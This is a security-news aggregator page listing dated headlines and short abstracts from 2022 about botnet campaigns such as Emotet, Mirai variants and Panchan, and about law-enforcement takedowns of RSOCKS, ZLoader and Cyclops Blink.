The Mirai-based botnet 'RapperBot' has re-emerged via a new campaign that infects IoT devices for DDoS (Distributed Denial of Service) attacks against game servers.BleepingComputer
November 14, 2022
KmsdBot, a new evasive bot for cryptomining activity and DDoS attacks Full Text
Abstract
Researchers spotted a new evasive malware, tracked as KmsdBot, that infects systems via an SSH connection that uses weak credentials. Akamai Security Research discovered a new evasive Golang-based malware, tracked as KmsdBot, that infects systems...Security Affairs
November 09, 2022
Experts Warn of Browser Extensions Spying On Users via Cloud9 Chrome Botnet Network Full Text
Abstract
The Keksec threat actor has been linked to a previously undocumented malware strain, which has been observed in the wild masquerading as an extension for Chromium-based web browsers to enslave compromised machines into a botnet. Called Cloud9 by security firm Zimperium, the malicious browser add-on comes with a wide range of features that enables it to siphon cookies, log keystrokes, inject arbitrary JavaScript code, mine crypto, and even enlist the host to carry out DDoS attacks. The extension "not only steals the information available during the browser session but can also install malware on a user's device and subsequently assume control of the entire device," Zimperium researcher Nipun Gupta said in a new report. The JavaScript botnet isn't distributed via Chrome Web Store or Microsoft Edge Add-ons, but rather through fake executables and rogue websites disguised as Adobe Flash Player updates. Once installed, the extension is designed to inject a JavaScrThe Hacker News
November 08, 2022
Amadey Bot Spotted Deploying LockBit 3.0 Ransomware on Hacked Machines Full Text
Abstract
The Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems, researchers have warned. "Amadey bot, the malware that is used to install LockBit, is being distributed through two methods: one using a malicious Word document file, and the other using an executable that takes the disguise of the Word file icon," AhnLab Security Emergency Response Center (ASEC) said in a new report published today. Amadey, first discovered in 2018, is a "criminal-to-criminal (C2C) botnet infostealer project," as described by the BlackBerry Research and Intelligence Team, and is offered for purchase on the criminal underground for as much as $600. While its primary function is to harvest sensitive information from the infected hosts, it further doubles up as a channel to deliver next-stage artifacts. Earlier this July, it was spread using SmokeLoader , a malware with not-so-different features like itself. Just last month, ASEC also found the malThe Hacker News
November 02, 2022
Emotet botnet starts blasting malware again after 4 month break Full Text
Abstract
The Emotet malware operation is again spamming malicious emails after almost a four-month "vacation" that saw little activity from the notorious cybercrime operation.BleepingComputer
November 02, 2022
Emotet botnet starts blasting malware again after 5 month break Full Text
Abstract
The Emotet malware operation is again spamming malicious emails after almost a five-month "vacation" that saw little activity from the notorious cybercrime operation.BleepingComputer
October 25, 2022
Emotet Botnet Drops Malware via Self-Unlocking Password-Protected RAR Files Full Text
Abstract
In an attack chain detected by Trustwave SpiderLabs researchers, an invoice-themed ZIP file lure was found to contain a nested self-extracting (SFX) archive, with the first archive having the purpose to launch the second.Heimdal Security
October 21, 2022
Emotet Botnet Distributing Self-Unlocking Password-Protected RAR Files to Drop Malware Full Text
Abstract
The notorious Emotet botnet has been linked to a new wave of malspam campaigns that take advantage of password-protected archive files to drop CoinMiner and Quasar RAT on compromised systems. In an attack chain detected by Trustwave SpiderLabs researchers, an invoice-themed ZIP file lure was found to contain a nested self-extracting (SFX) archive, the first archive acting as a conduit to launch the second. While phishing attacks like these traditionally require persuading the target into opening the attachment, the cybersecurity company said the campaign sidesteps this hurdle by making use of a batch file to automatically supply the password to unlock the payload. The first SFX archive file further makes use of either a PDF or Excel icon to make it appear legitimate, when, in reality, it contains three components: the password-protected second SFX RAR file, the aforementioned batch script which launches the archive, and a decoy PDF or image. "The execution of the batch fThe Hacker News
October 14, 2022
Mirai Botnet Hits Wynncraft Minecraft Server with 2.5 Tbps DDoS Attack Full Text
Abstract
Web infrastructure and security company Cloudflare disclosed this week that it halted a 2.5 Tbps distributed denial-of-service (DDoS) attack launched by a Mirai botnet. Characterizing it as a "multi-vector attack consisting of UDP and TCP floods," researcher Omer Yoachimik said the DDoS attack targeted the Minecraft server Wynncraft in Q3 2022. "The entire 2.5 Tbps attack lasted about 2 minutes, and the peak of the 26 million rps attack [was] only 15 seconds," Yoachimik noted . "This is the largest attack we've ever seen from the bitrate perspective." Cloudflare also pointed to a surge in multi-terabit DDoS attacks as well as longer-lasting volumetric attacks during the time period, not to mention an uptick in attacks targeting Taiwan and Japan. The disclosure comes almost 10 months after Microsoft said it thwarted a record-breaking 3.47 Tbps DDoS attack in November 2021 directed against an unnamed Azure customer in Asia. Other DDoS attacksThe Hacker News
October 12, 2022
PseudoManuscrypt Botnet Evolves to Infect More Systems Full Text
Abstract
The relatively new PseudoManuscrypt botnet made some changes to its C2 infrastructure that enabled the threat actors infect nearly 500,000 systems across 40 countries in the past eight months. Previously, Kaspersky had reported a similar technique being used by different malware families such as So ... Read MoreCyware Alerts - Hacker News
September 19, 2022
Emotet Botnet Started Distributing Quantum and BlackCat Ransomware Full Text
Abstract
The Emotet malware is now being leveraged by ransomware-as-a-service (RaaS) groups, including Quantum and BlackCat, after Conti's official retirement from the threat landscape this year. Emotet started off as a banking trojan in 2014, but updates added to it over time have transformed the malware into a highly potent threat that's capable of downloading other payloads onto the victim's machine, which would allow the attacker to control it remotely. Although the infrastructure associated with the invasive malware loader was taken down as part of a law enforcement effort in January 2021, the Conti ransomware cartel is said to have played an instrumental role in its comeback late last year. "From November 2021 to Conti's dissolution in June 2022, Emotet was an exclusive Conti ransomware tool, however, the Emotet infection chain is currently attributed to Quantum and BlackCat," AdvIntel said in an advisory published last week. Typical attack sequencesThe Hacker News
September 19, 2022
How botnet attacks work and how to defend against them Full Text
Abstract
Experts believe that the development of serverless technologies will further simplify the creation of botnets for DDoS attacks. Here's how Gcore can counter these threats.BleepingComputer
September 17, 2022
Emotet botnet now pushes Quantum and BlackCat ransomware Full Text
Abstract
While monitoring the Emotet botnet's current activity, security researchers found that the malware is now being used by the Quantum and BlackCat ransomware gang to deploy their payloads.BleepingComputer
September 12, 2022
Bad bots are coming at APIs! How to beat the API bot attacks? Full Text
Abstract
75% of login attempts from Application Programming Interface (API) endpoints are malicious – according to perimeterx. Hackers systematically use bots for malicious login attempts.Help Net Security
September 07, 2022
Ukraine dismantles more bot farms spreading Russian disinformation Full Text
Abstract
The Cyber Department of the Ukrainian Security Service (SSU) dismantled two more bot farms that spread Russian disinformation on social networks and messaging platforms via thousands of fake accounts.BleepingComputer
September 7, 2022
Moobot botnet is back and targets vulnerable D-Link routers Full Text
Abstract
The Moobot botnet is behind a new wave of attacks that started in early August and that target vulnerable D-Link routers. Palo Alto Network’s Unit 42 researchers reported a new wave of attacks launched by the Moobot botnet that target vulnerable...Security Affairs
September 07, 2022
Mirai Variant MooBot Botnet Exploiting D-Link Router Vulnerabilities Full Text
Abstract
A variant of the Mirai botnet known as MooBot is co-opting vulnerable D-Link devices into an army of denial-of-service bots by taking advantage of multiple exploits. "If the devices are compromised, they will be fully controlled by attackers, who could utilize those devices to conduct further attacks such as distributed denial-of-service (DDoS) attacks," Palo Alto Networks Unit 42 said in a Tuesday report. MooBot, first disclosed by Qihoo 360's Netlab team in September 2019, has previously targeted LILIN digital video recorders and Hikvision video surveillance products to expand its network. In the latest wave of attacks discovered by Unit 42 in early August 2022, as many as four different flaws in D-Link devices, both old and new, have paved the way for the deployment of MooBot samples. These include - CVE-2015-2051 (CVSS score: 10.0) - D-Link HNAP SOAPAction Header Command Execution Vulnerability CVE-2018-6530 (CVSS score: 9.8) - D-Link SOAP Interface ReThe Hacker News
September 06, 2022
Moobot botnet is coming for your unpatched D-Link router Full Text
Abstract
The Mirai malware botnet variant known as 'MooBot' has re-emerged in a new attack wave that started early last month, targeting vulnerable D-Link routers with a mix of old and new exploits.BleepingComputer
August 08, 2022
New Orchard Botnet Uses Bitcoin Founder’s Account Info to Generate Malicious Domains Full Text
Abstract
A new botnet named Orchard has been observed using Bitcoin creator Satoshi Nakamoto's account transaction information to generate domain names to conceal its command-and-control (C2) infrastructure. "Because of the uncertainty of Bitcoin transactions, this technique is more unpredictable than using the common time-generated [ domain generation algorithms ], and thus more difficult to defend against," researchers from Qihoo 360's Netlab security team said in a Friday write-up. Orchard is said to have undergone three revisions since February 2021, with the botnet primarily used to deploy additional payloads onto a victim's machine and execute commands received from the C2 server. It's also designed to upload device and user information as well as infect USB storage devices to propagate the malware. Netlab's analysis shows that over 3,000 hosts have been enslaved by the malware to date, most of them located in China. Orchard has also been subjected toThe Hacker News
August 8, 2022
Orchard botnet uses Bitcoin Transaction info to generate DGA domains Full Text
Abstract
Experts spotted a new botnet named Orchard using Bitcoin creator Satoshi Nakamoto's account information to generate malicious domains. 360 Netlab researchers recently discovered a new botnet named Orchard that uses Satoshi Nakamoto's Bitcoin account...Security Affairs
August 5, 2022
New Linux botnet RapperBot brute-forces SSH servers Full Text
Abstract
RapperBot is a new botnet employed in attacks since mid-June 2022 that targets Linux SSH servers with brute-force attacks. Researchers from FortiGuard Labs have discovered a new IoT botnet tracked as RapperBot which is active since mid-June 2022....Security Affairs
July 26, 2022
IoT Botnets Fuels DDoS Attacks – Are You Prepared? Full Text
Abstract
The increased proliferation of IoT devices paved the way for the rise of IoT botnets that amplifies DDoS attacks today. This is a dangerous warning that the possibility of a sophisticated DDoS attack and a prolonged service outage will prevent businesses from growing.Threatpost
July 21, 2022
8220 Gang: A Group With Botnet of 30,000 Hosts Full Text
Abstract
8220 Gang, a cryptomining gang, has been exploiting Linux and cloud app vulnerabilities to grow their botnet network to more than 30,000 infected hosts. The low-skilled 8220 Gang is financially-motivated and targets Aliyun, AWS, QCloud, GCP, and Azure hosts. Botnet attacks can be controll ... Read MoreCyware Alerts - Hacker News
July 21, 2022
8220 Gang Cloud Botnet infected 30,000 host globally Full Text
Abstract
The crimeware group known as 8220 Gang expanded over the last month their Cloud Botnet to roughly 30,000 hosts globally. Researchers from SentinelOne reported that low-skill crimeware 8220 Gang has expanded their Cloud Botnet over the last month...Security Affairs
July 20, 2022
This Cloud Botnet Has Hijacked 30,000 Systems to Mine Cryptocurrencies Full Text
Abstract
The 8220 cryptomining group has expanded in size to encompass as many as 30,000 infected hosts, up from 2,000 hosts globally in mid-2021. "8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors," Tom Hegel of SentinelOne said in a Monday report. The growth is said to have been fueled through the use of Linux and common cloud application vulnerabilities and poorly secured configurations for services such as Docker, Apache WebLogic, and Redis. Active since early 2017, the Chinese-speaking, Monero-mining threat actor was most recently seen targeting i686 and x86_64 Linux systems by means of weaponizing a recent remote code execution exploit for Atlassian Confluence Server (CVE-2022-26134) to drop the PwnRig miner payload. "Victims are not targeted geographically, but simply identified by theiThe Hacker News
July 19, 2022
Hacking group ‘8220’ grows cloud botnet to more than 30,000 hosts Full Text
Abstract
A cryptomining gang known as 8220 Gang has been exploiting Linux and cloud app vulnerabilities to grow their botnet to more than 30,000 infected hosts.BleepingComputer
July 19, 2022
Sality Botnet Evolves to Target Industrial Control Systems Full Text
Abstract
A threat actor is infecting ICS to create a botnet through password cracking software for unlocking Programmable Logic Controllers (PLCs) and Human Machine Interface (HMI) terminals.Cyware Alerts - Hacker News
July 16, 2022
Tiny Mantis Botnet Can Launch More Powerful DDoS Attacks Than Mirai Full Text
Abstract
According to Cloudflare content distribution network, a botnet named Mantis is so powerful that it has launched the biggest ever DDoS attacks. The botnet has thus far targeted around 1,000 Cloudflare customers within the past few weeks.Hackread
July 15, 2022
Tainted password-cracking software for industrial systems used to spread P2P Sality bot Full Text
Abstract
Dragos researchers uncovered a small-scale campaign targeting industrial engineers and operators with Sality malware. During a routine vulnerability assessment, Dragos researchers discovered a campaign targeting industrial engineers and operators...Security Affairs
July 15, 2022
Tiny ‘Mantis’ Botnet Launching the Most Powerful DDoS Attacks Yet Full Text
Abstract
The botnet – which Cloudflare calls Mantis and which is named after the small, razor-legged prawn – generated a short but record-breaking DDoS attack in June that peaked at 26 million HTTPS requests per second (rps).ZDNet
July 14, 2022
Mantis botnet behind the record-breaking DDoS attack in June Full Text
Abstract
The record-breaking distributed denial-of-service (DDoS) attack that Cloudflare mitigated last month originated from a new botnet called Mantis, which is currently described as "the most powerful botnet to date."BleepingComputer
June 29, 2022
The Link Between AWM Proxy & the Glupteba Botnet – Krebs on Security Full Text
Abstract
Despite all of the disruption caused by Google’s legal and technical meddling, AWM is still around and nearly as healthy as ever, although the service has been rebranded with a new name and there are dubious claims of new owners.Krebs on Security
June 28, 2022
Scalper Bots Leave the Israeli Government Helpless Full Text
Abstract
Scalper bots have gone out of control in Israel by signing up for public service appointments for several government services and then selling them to dissatisfied citizens. The bot's operators attempted to sell appointments for multiple government agencies for over $100. In order to beat mo ... Read MoreCyware Alerts - Hacker News
June 23, 2022
Scalper bots out of control in Israel, selling state appointments Full Text
Abstract
Out-of-control scalper bots have created havoc in Israel by registering public service appointments for various government services and then offering to sell them to disgruntled citizens.BleepingComputer
June 18, 2022
US DoJ announced to have shut down the Russian RSOCKS Botnet Full Text
Abstract
The U.S. Department of Justice (DoJ) announced to have shut down the infrastructure associated with the Russian botnet RSOCKS. The U.S. Department of Justice (DoJ) announced to have shut down the infrastructure associated with the Russian botnet RSOCKS...Security Affairs
June 17, 2022
Authorities Shut Down Russian RSOCKS Botnet That Hacked Millions of Devices Full Text
Abstract
The U.S. Department of Justice (DoJ) on Thursday disclosed that it took down the infrastructure associated with a Russian botnet known as RSOCKS in collaboration with law enforcement partners in Germany, the Netherlands, and the U.K. The botnet, operated by a sophisticated cybercrime organization, is believed to have ensnared millions of internet-connected devices, including Internet of Things (IoT) devices, Android phones, and computers for use as a proxy service. Botnets, a constantly evolving threat, are networks of hijacked computer devices that are under the control of a single attacking party and are used to facilitate a variety of large-scale cyber intrusions such as distributed denial-of-service (DDoS) attacks, email spam, and cryptojacking. "The RSOCKS botnet offered its clients access to IP addresses assigned to devices that had been hacked," the DoJ said in a press release. "The owners of these devices did not give the RSOCKS operator(s) authority to acThe Hacker News
June 17, 2022
Russian RSocks botnet disrupted after hacking millions of devices Full Text
Abstract
The U.S. Department of Justice has announced the disruption of the Russian RSocks malware botnet used to hijack millions of computers, Android smartphones, and IoT (Internet of Things) devices worldwide for use as proxy servers.BleepingComputer
June 15, 2022
Panchan: A New Golang-based Peer-To-Peer Botnet Targeting Linux Servers Full Text
Abstract
A new Golang-based peer-to-peer (P2P) botnet has been spotted actively targeting Linux servers in the education sector since its emergence in March 2022. Dubbed Panchan by Akamai Security Research, the malware "utilizes its built-in concurrency features to maximize spreadability and execute malware modules" and "harvests SSH keys to perform lateral movement." The feature-packed botnet, which relies on a basic list of default SSH passwords to carry out a dictionary attack and expand its reach, primarily functions as a cryptojacker designed to hijack a computer's resources to mine cryptocurrencies. The cybersecurity and cloud service company noted it first spotted Panchan's activity on March 19, 2022, and attributed the malware to a likely Japanese threat actor based on the language used in the administrative panel baked into the binary to edit the mining configuration. Panchan is known to deploy and execute two miners, XMRig and nbhash, on the hostThe Hacker News
June 15, 2022
Panchan Golang P2P botnet targeting Linux servers in cryptomining campaign Full Text
Abstract
Researchers discovered a new Golang-based peer-to-peer (P2P) botnet, dubbed Panchan, targeting Linux servers in the education sector since March 2022. Akamai security researchers discovered a new Golang-based P2P Botnet, tracked as Panchan, that...Security Affairs
June 15, 2022
New peer-to-peer botnet infects Linux servers with cryptominers Full Text
Abstract
A new peer-to-peer botnet named Panchan appeared in the wild around March 2022, targeting Linux servers in the education sector to mine cryptocurrency.BleepingComputer
June 08, 2022
Linux botnets now exploit critical Atlassian Confluence bug Full Text
Abstract
Several botnets are now using exploits targeting a critical remote code execution (RCE) vulnerability to infect Linux servers running unpatched Atlassian Confluence Server and Data Center installs.BleepingComputer
June 3, 2022
Clipminer Botnet already allowed operators to make at least $1.7 Million Full Text
Abstract
The Clipminer botnet allowed operators to earn at least $1.7 million, according to a report published by security researchers at Symantec. Researchers at Symantec’s Threat Hunter Team uncovered a cryptomining operation that has potentially made...Security Affairs
June 1, 2022
New XLoader Botnet version uses new techniques to obscure its C2 servers Full Text
Abstract
A new version of the XLoader botnet is implementing a new technique to obscure the Command and Control infrastructure. Researchers from Check Point have discovered a new version of the XLoader botnet, which implements significant enhancements, such...Security Affairs
June 1, 2022
EnemyBot Botnet Expanding its Scope by Targeting Latest Vulnerabilities Full Text
Abstract
EnemyBot botnet expanded its attack scope to exploit critical vulnerabilities found in VMware, Android, and F5 BIG-IP. It is suspected to have some strong correlation with the LolFMe botnet in terms of having similar strings, structure, and patterns in the code. The botnet is under active developme ... Read MoreCyware Alerts - Hacker News
June 01, 2022
New XLoader Botnet Version Using Probability Theory to Hide its C&C Servers Full Text
Abstract
An enhanced version of the XLoader malware has been spotted adopting a probability-based approach to camouflage its command-and-control (C&C) infrastructure, according to the latest research. "Now it is significantly harder to separate the wheat from the chaff and discover the real C&C servers among thousands of legitimate domains used by Xloader as a smokescreen," Israeli cybersecurity company Check Point said . First spotted in the wild in October 2020, XLoader is a successor to Formbook and a cross-platform information stealer that's capable of plundering credentials from web browsers, capturing keystrokes and screenshots, and executing arbitrary commands and payloads. More recently, the ongoing geopolitical conflict between Russia and Ukraine has proved to be a lucrative fodder for distributing XLoader by means of phishing emails aimed at high-ranking government officials in Ukraine. The latest findings from Check Point build on a previous reporThe Hacker News
May 31, 2022
New XLoader botnet uses probability theory to hide its servers Full Text
Abstract
Threat analysts have spotted a new version of the XLoader botnet malware that uses probability theory to hide its command and control servers, making it difficult to disrupt the malware's operation.BleepingComputer
May 30, 2022
EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities Full Text
Abstract
A nascent Linux-based botnet named Enemybot has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS). "The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities," AT&T Alien Labs said in a technical write-up published last week. "Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices." First disclosed by Securonix in March and later by Fortinet , Enemybot has been linked to a threat actor tracked as Keksec (aka Kek Security, Necro, and FreakOut), with early attacks targeting routers from Seowon Intech, D-Link, and iRZ. Enemybot, which is capable of carrying out DDoS attacks , draws its origins from several other botnets like Mirai, Qbot, Zbot, Gafgyt, and LolFMe. An analysis of the latest variant revealsThe Hacker News
May 23, 2022
Russia-linked Fronton botnet could run disinformation campaigns Full Text
Abstract
Researchers warn that the Fronton botnet was used by Russia-linked threat actors for coordinated disinformation campaigns. Fronton is a distributed denial-of-service (DDoS) botnet that was used by Russia-linked threat actors for coordinated disinformation...Security Affairs
May 19, 2022
Russia-linked Fronton Botnet Goes Beyond Just DDoS attacks at Scale Full Text
Abstract
An investigation into the Fronton botnet has revealed far more than the ability to perform DDoS attacks, with the exposure of coordinated inauthentic behavior "on a massive scale."ZDNet
May 17, 2022
New Sysrv Botnet Variant Hijacking Windows and Linux with Crypto Miners Full Text
Abstract
Microsoft is warning of a new variant of the srv botnet that's exploiting multiple security flaws in web applications and databases to install coin miners on both Windows and Linux systems. The tech giant, which has called the new version Sysrv-K , is said to weaponize an array of exploits to gain control of web servers. The cryptojacking botnet first emerged in December 2020. "Sysrv-K scans the internet to find web servers with various vulnerabilities to install itself," the company said in a series of tweets. "The vulnerabilities range from path traversal and remote file disclosure to arbitrary file download and remote code execution vulnerabilities." This also includes CVE-2022-22947 (CVSS score: 10.0), a code injection vulnerability in Spring Cloud Gateway that could be exploited to allow arbitrary remote execution on a remote host via a maliciously crafted request. It's worth noting that the abuse of CVE-2022-22947 has prompted the U.S. CybThe Hacker News
May 15, 2022
Sysrv-K, a new variant of the Sysrv botnet includes new exploits Full Text
Abstract
Microsoft reported that the Sysrv botnet is targeting Windows and Linux servers exploiting flaws in the Spring Framework and WordPress. Microsoft Security Intelligence team Microsoft reported that a new variant of the Sysrv botnet,...Security Affairs
May 13, 2022
Microsoft: Sysrv botnet targets Windows, Linux servers with new exploits Full Text
Abstract
Microsoft says the Sysrv botnet is now exploiting vulnerabilities in the Spring Framework and WordPress to ensnare and deploy cryptomining malware on vulnerable Windows and Linux servers.BleepingComputer
May 13, 2022
FluBot Spreads via SMS Campaigns to Target Finnish People Full Text
Abstract
The NCSC-FI issued a warning about increased FluBot activities. Now, it has gone beyond Android to target iPhone users via a new campaign that uses SMS and MMS. These SMS messages contain links to voicemail, missed call notifications, or alerts about incoming money from an unknown financial transac ... Read MoreCyware Alerts - Hacker News
April 26, 2022
Emotet Testing New Delivery Ideas After Microsoft Disables VBA Macros by Default Full Text
Abstract
The threat actor behind the prolific Emotet botnet is testing new attack methods on a small scale before co-opting them into their larger volume malspam campaigns, potentially in response to Microsoft's move to disable Visual Basic for Applications (VBA) macros by default across its products. Calling the new activity a "departure" from the group's typical behavior, ProofPoint alternatively raised the possibility that the latest set of phishing emails distributing the malware show that the operators are now "engaged in more selective and limited attacks in parallel to the typical massive scale email campaigns." Emotet, the handiwork of a cybercrime group tracked as TA542 (aka Mummy Spider or Gold Crestwood ), staged a revival of sorts late last year after a 10-month-long hiatus following a coordinated law enforcement operation to take down its attack infrastructure. Since then, Emotet campaigns have targeted thousands of customers with tens ofThe Hacker News
April 22, 2022
Android Bianlian Botnet Tries to Bypass Photo TAN Authentication Used for Mobile Banking Full Text
Abstract
The Android malware typically poses as a video player, Google Play app, or a mobile banking application. Once installed, it asks the victim to activate Accessibility Services for the app to “work correctly.”Fortinet
April 22, 2022
Lemon_Duck cryptomining botnet targets Docker servers Full Text
Abstract
The Lemon_Duck cryptomining botnet is targeting Docker servers to mine cryptocurrency on Linux systems. Crowdstrikes researchers reported that the Lemon_Duck cryptomining botnet is targeting Docker to mine cryptocurrency on Linux systems....Security Affairs
April 20, 2022
BotenaGo’s New Avatar Targets Lilin DVR Devices Full Text
Abstract
In October 2021, the source code of BotenaGo was leaked, leading to the creation of newer variants based on the original. Since then, researchers have observed various variants of BotenaGo.Cyware Alerts - Hacker News
April 19, 2022
Emotet botnet switches to 64-bit modules, increases activity Full Text
Abstract
The Emotet malware is having a burst in distribution and is likely to soon switch to new payloads that are currently detected by fewer antivirus engines.BleepingComputer
April 17, 2022
Enemybot, a new DDoS botnet appears in the threat landscape Full Text
Abstract
Enemybot is a DDoS botnet that targeted several routers and web servers by exploiting known vulnerabilities. Researchers from Fortinet discovered a new DDoS botnet, tracked as Enemybot, that has targeted several routers and web servers by exploiting...Security Affairs
April 14, 2022
New EnemyBot DDoS Botnet Borrows Exploit Code from Mirai and Gafgyt Full Text
Abstract
A threat group that pursues crypto mining and distributed denial-of-service (DDoS) attacks has been linked to a new botnet called Enemybot, which has been discovered enslaving routers and Internet of Things (IoT) devices since last month. "This botnet is mainly derived from Gafgyt 's source code but has been observed to borrow several modules from Mirai 's original source code," Fortinet FortiGuard Labs said in a report this week. The botnet has been attributed to an actor named Keksec (aka Kek Security , Necro, and FreakOut ), which has been linked to multiple botnets such as Simps , Ryuk (not to be confused with the ransomware of the same name), and Samael , and has a history of targeting cloud infrastructure to carry out crypto mining and DDoS operations. Primarily targeting routers from Seowon Intech, D-Link, and iRZ to propagate its infections and grow in volume, an analysis of the malware specimen has highlighted Enemybot's obfuscation attempThe Hacker News
April 14, 2022
Microsoft Disrupts ZLoader Cybercrime Botnet in Global Operation Full Text
Abstract
Microsoft and a consortium of cybersecurity companies took legal and technical steps to disrupt the ZLoader botnet , seizing control of 65 domains that were used to control and communicate with the infected hosts. "ZLoader is made up of computing devices in businesses, hospitals, schools, and homes around the world and is run by a global internet-based organized crime gang operating malware as a service that is designed to steal and extort money," Amy Hogan-Burney, general manager of Microsoft's Digital Crimes Unit (DCU), said . The operation, Microsoft said, was undertaken in collaboration with ESET, Lumen's Black Lotus Labs, Palo Alto Networks Unit 42, Avast, Financial Services Information Sharing and Analysis Center (FS-ISAC), and Health Information Sharing and Analysis Center (H-ISAC). As a result of the disruption, the domains are now redirected to a sinkhole, effectively preventing the botnet's criminal operators from contacting the compromised devices.The Hacker News
April 14, 2022
Microsoft has taken legal and technical action to dismantle the Zloader botnet Full Text
Abstract
Microsoft's Digital Crimes Unit (DCU) announced to have shut down dozens C2 servers used by the infamous ZLoader botnet. Microsoft dismantled the C2 infrastructure used by the ZLoader trojan with the help of telecommunications providers around the world...Security Affairs
April 13, 2022
New Fodcha DDoS botnet targets over 100 victims every day Full Text
Abstract
A rapidly growing botnet is ensnaring routers, DVRs, and servers across the Internet to target more than 100 victims every day in distributed denial-of-service (DDoS) attacks.BleepingComputer
April 12, 2022
SharkBot Propagates via Fake Antivirus Apps on Google Play Full Text
Abstract
Check Point researchers discovered seven malicious apps on the Google Play Store posing as antivirus solutions to drop the SharkBot banking trojan. These malicious apps were downloaded more than 15,000 times before Google removed them. Researchers advise downloading apps only from trusted/verified ... Read MoreCyware Alerts - Hacker News
April 11, 2022
Russia-linked Cyclops Blink Botnet Taken Down Full Text
Abstract
The FBI announced taking down the Cyclops Blink botnet, which used to target firewall appliances and SOHO networking devices. It was under the control of the Russian Sandworm group. The operation's initial court authorization was given on March 18, the botnet infection was fully removed from all id ... Read MoreCyware Alerts - Hacker News
April 11, 2022
Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware Full Text
Abstract
Trend Micro Threat Research observed active exploitation of the Spring4Shell vulnerability assigned as CVE-2022-22965, which allows malicious actors to weaponize and execute the Mirai botnet malware.Trend Micro
April 08, 2022
Hackers Exploiting Spring4Shell Vulnerability to Deploy Mirai Botnet Malware Full Text
Abstract
The recently disclosed critical Spring4Shell vulnerability is being actively exploited by threat actors to execute the Mirai botnet malware , particularly in the Singapore region since the start of April 2022. "The exploitation allows threat actors to download the Mirai sample to the '/tmp' folder and execute them after permission change using 'chmod ,'" Trend Micro researchers Deep Patel, Nitesh Surana, Ashish Verma said in a report published Friday. Tracked as CVE-2022-22965 (CVSS score: 9.8), the vulnerability could allow malicious actors to achieve remote code execution in Spring Core applications under non-default circumstances, granting the attackers full control over the compromised devices. The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) earlier this week added the Spring4Shell vulnerability to its Known Exploited Vulnerabilities Catalog based on "evidence of active exploitation." This isThe Hacker News
April 07, 2022
FBI Shut Down Russia-linked “Cyclops Blink” Botnet That Infected Thousands of Devices Full Text
Abstract
The U.S. Department of Justice (DoJ) announced that it neutralized Cyclops Blink , a modular botnet controlled by a threat actor known as Sandworm, which has been attributed to the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). "The operation copied and removed malware from vulnerable internet-connected firewall devices that Sandworm used for command-and-control (C2) of the underlying botnet," the DoJ said in a statement Wednesday. In addition to disrupting its C2 infrastructure, the operation also closed the external management ports that the threat actor used to establish connections with the firewall appliances, effectively severing contact and preventing the hacking group from using the infected devices to commandeer the botnet. The March 22 court-authorized disruption of Cyclops Blink comes a little over a month after intelligence agencies in the U.K. and the U.S. described the botnet as a replacement framThe Hacker News
April 6, 2022
US dismantled the Russia-linked Cyclops Blink botnet Full Text
Abstract
The U.S. government announced the disruption of the Cyclops Blink botnet operated by the Russia-linked Sandworm APT group. The U.S. government announced that it had dismantled the Cyclops Blink botnet operated by the Russia-linked Sandworm APT group....Security Affairs
April 06, 2022
US disrupts Russian Cyclops Blink botnet before being used in attacks Full Text
Abstract
US government officials announced today the disruption of the Cyclops Blink botnet controlled by the Russian-backed Sandworm hacking group before being used in attacks.BleepingComputer
April 5, 2022
Beastmode Botnet Adds New Exploits to its Arsenal Full Text
Abstract
According to Fortinet, BeastMode attempts to infect TOTOLINK routers by exploiting several vulnerabilities. The threat actors added the exploits just a week after the PoCs were publicly released on GitHub.Cyware Alerts - Hacker News
April 2, 2022
Beastmode Mirai botnet now includes exploits for Totolink routers Full Text
Abstract
Operators behind the Mirai-based distributed denial-of-service (DDoS) botnet Beastmode (aka B3astmode) added exploits for Totolink routers. The Mirai-based distributed denial-of-service (DDoS) botnet Beastmode (aka B3astmode) now includes exploits...Security Affairs
April 01, 2022
Beastmode botnet boosts DDoS power with new router exploits Full Text
Abstract
A Mirai-based distributed denial-of-service (DDoS) botnet tracked as Beastmode (aka B3astmode) has updated its list of exploits to include several new ones, three of them targeting various models of Totolink routers.BleepingComputer
March 30, 2022
Muhstik Botnet Gang Targets Redis Exploit Within One Day of Public POC Release Full Text
Abstract
Muhstik botnet operators were found exploiting a recently disclosed bug in some Redis Debian packages to infiltrate servers and then use it for DDOS attacks. The attackers target the vulnerability CVE-2022-0543 in Redis Debian packages. To protect against this particular attack, users are recommend ... Read MoreCyware Alerts - Hacker News
March 28, 2022
Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability Full Text
Abstract
The Muhstik botnet has been observed targeting Redis servers exploiting the recently disclosed CVE-2022-0543 vulnerability. Muhstik is a botnet that is known to use web application exploits to compromise IoT devices, it has been around for at least...Security Affairs
March 27, 2022
Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability Full Text
Abstract
Muhstik, a botnet infamous for propagating via web application exploits, has been observed targeting Redis servers using a recently disclosed vulnerability in the database system. The vulnerability relates to CVE-2022-0543 , a Lua sandbox escape flaw in the open-source, in-memory, key-value data store that could be abused to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 for severity. "Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host," Ubuntu noted in an advisory released last month. According to telemetry data gathered by Juniper Threat Labs, the attacks leveraging the new flaw are said to have commenced on March 11, 2022, leading to the retrieval of a malicious shell script ("russia.sh") from a remote server, which is then utilized to fetch and execute the botnet binaries from another sThe Hacker News
March 23, 2022
Over 200,000 MicroTik Routers Worldwide Are Under the Control of Botnet Malware Full Text
Abstract
